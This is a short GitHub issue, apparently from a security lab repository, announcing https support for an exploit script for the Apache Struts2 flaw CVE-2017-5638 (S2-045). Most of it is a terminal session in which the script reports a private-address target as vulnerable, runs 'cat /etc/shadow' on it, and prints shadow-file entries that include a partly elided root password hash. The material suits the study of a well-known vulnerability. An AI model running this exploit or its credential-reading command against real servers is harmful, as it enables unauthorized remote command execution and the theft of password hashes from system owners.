[Exploit] CVE-2017-5638 : Apache Struts2 S2_045

Open nixawk opened this issue 8 years ago • 0 comments

Add https support - https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py

$ python2.7 test.py https://192.168.1.100/ "cat /etc/shadow"
[+] The target is vulnerable.
[*] struts2-cmd $ cat /etc/shadow

[*] root:$6$nK....9iIdLoX3VzX.U.:17221:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
....

Nov 28 '17 00:11 nixawk